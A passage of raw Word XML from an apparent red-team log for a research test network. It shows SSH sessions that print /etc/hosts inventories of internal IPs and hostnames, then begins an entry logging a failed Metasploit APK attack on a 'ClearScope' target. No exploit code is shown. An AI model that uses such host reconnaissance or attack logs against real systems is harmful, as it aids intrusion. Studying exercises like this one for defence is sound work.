        <w:t xml:space="preserve">128.55.12.56            ta1-fivedirections-2-dp                                                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB76DD4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.0.4.2                files.tc.bbn.com devel.tc.bbn.com                                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFD2533" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">128.55.12.115           ta1-theia-replay-marple-1-dp                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1388DE70" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">128.55.12.85            ta1-theia-database-dp                                                                                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CA180D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">128.55.12.112           ta1-theia-analysis-dp                                                                                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58096863" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">128.55.12.110           ta1-theia-target-1-dp ta1-theia-target-3-dp                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF68A9C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">128.55.12.51            ta1-cadets-1-dp                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C306B0C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">128.55.12.119           ta1-theia-target-3-dp                                                                                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28878640" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">128.55.12.111           ta1-theia-target-2-dp                                                                                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72360563" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">128.55.12.113           ta1-theia-replay-adapt-1-dp                                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D799363" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">128.55.12.75            ta1-cadets-2-dp                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C181082" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">128.55.12.106           ta1-cadets-3-dp                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223E3960" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">128.55.12.126           ta1-trace-3-dp                                                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482BCBCD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">128.55.12.118           ta1-trace-2-dp                                                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53364C97" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">128.55.12.117           ta1-trace-1-dp                                                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652523E1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">128.55.12.54            ta3-perf-2-dp                                                                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDE6593" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">128.55.12.123           ta1-fivedirections-translate-3-dp                                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEB9563" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">128.55.12.79            ta52-ubuntu-2-dp                                                                                        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACEE0C4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">128.55.12.57            ta3-perf-3-dp                                                                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9184F7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">128.55.12.78            ta52-ubuntu-1-dp                                                                                        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A6AF54" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">128.55.12.77            ta52-windows-2-dp                                                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA0FACF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">128.55.12.76            ta52-windows-1-dp                                                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC2DA7A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">128.55.12.66            ta1-marple-1-dp                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074436CB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">128.55.12.124           ta1-marple-3-dp                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF6AD43" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">128.55.12.67            ta1-marple-2-dp                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3861C0ED" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">128.55.12.55            ta1-fivedirections-1-dp          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193318EB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="584FBA86" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:05</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B387A4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Connection to 128.55.12.109 closed.stem32\drivers\etc&gt;exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536753B4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E02F1EA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12076977" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-2:~$ cat /etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4165AA56" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>127.0.0.1       localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7444703E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>127.0.1.1       ta1-trace-2.tc.bbn.com  ta1-trace-2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0092F3E9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>#       The     following       lines   are     desirable       for     IPv6    capable hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A3EF03" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>::1     localhost       ip6-localhost   ip6-loopback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1516DD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ff02::1 ip6-allnodes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601AFA48" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ff02::2 ip6-allrouters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06008429" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.73    ta3-prometheus-1-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDAD0DD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.59    ta3-starc-1-dp  kafka-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518BA26C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.60    ta3-starc-2-dp  kafka-2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E2F7E7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.61    ta3-starc-3-dp  kafka-3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424D3D9F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.62    ta3-starc-4-dp  kafka-4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2841DB66" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.63    ta3-starc-5-dp  kafka-5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018A9B58" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.64    ta3-starc-6-dp  kafka-6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7636CA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.118   ta1-trace-2-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B20C995" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.117   ta1-trace-1-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E25B81" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>10.0.4.2        files.tc.bbn.com        devel.tc.bbn.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDD3FCE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.78    ta52-ubuntu-1-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE57070" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.52    ta3-test-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C177824" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.112   ta1-theia-analysis-dp   ta1-theia-nfs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B68D5DF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.85    ta1-theia-database-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE188DB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.77    ta52-windows-2-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4BFFEB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.76    ta52-windows-1-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A5A35A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.79    ta52-ubuntu-2-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D788A64" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.110   ta1-theia-target-1-dp   ta1-theia-target-3-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0461D7E1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.115   ta1-theia-replay-marple-1-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A37308" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.51    ta1-cadets-1-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7180DEC2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.119   ta1-theia-target-3-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EEA50B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.111   ta1-theia-target-2-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193E9ED8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12608416" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB7FBA3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-2:~$ exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3D662A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>logout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A85642C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Connection to 128.55.12.118 closed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A60E332" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01F8CEA2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411BCBAF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-theia-target-1:~$ exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6261C035" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>logout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B17949C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32ACF8F8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D802D5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[admin@ta1-cadets-1 ~]$ exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F17CD1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>logout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704E5D27" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09588B58" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E67148" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[admin@ta1-cadets-1 ~]$ exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EFEABB" w14:textId="6F79C448" w:rsidR="00A351B2" w:rsidRPr="002911C2" w:rsidRDefault="002911C2" w:rsidP="002911C2">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>logout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A663FC" w14:textId="4756A253" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56BD921F" w14:textId="494DC904" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="002911C2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="_Toc12600041"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>05/13/</w:t>
      </w:r>
      <w:r w:rsidR="00A351B2" w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">2019 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>– Metasploit APK</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:p w14:paraId="419B808F" w14:textId="46407626" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="_krnb1k4ubr5t" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="81" w:name="_Toc12600042"/>
      <w:bookmarkEnd w:id="80"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Schedule</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8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475"/>
        <w:gridCol w:w="5865"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A351B2" w:rsidRPr="00FC027E" w14:paraId="7118CADB" w14:textId="77777777" w:rsidTr="006C3099">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="059FCADD"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10:26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5E363CC0"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TA1 ClearScope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5865" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="61C581FE"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Metasploit APK (Failed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="16ACFA2E" w14:textId="4F2F3FCF" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="82" w:name="_wjyun2w68sza" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="83" w:name="_Toc12600043"/>
      <w:bookmarkEnd w:id="82"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>10:26 -- ClearScope -- Metasploit APK</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
    </w:p>
    <w:p w14:paraId="0506714F" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
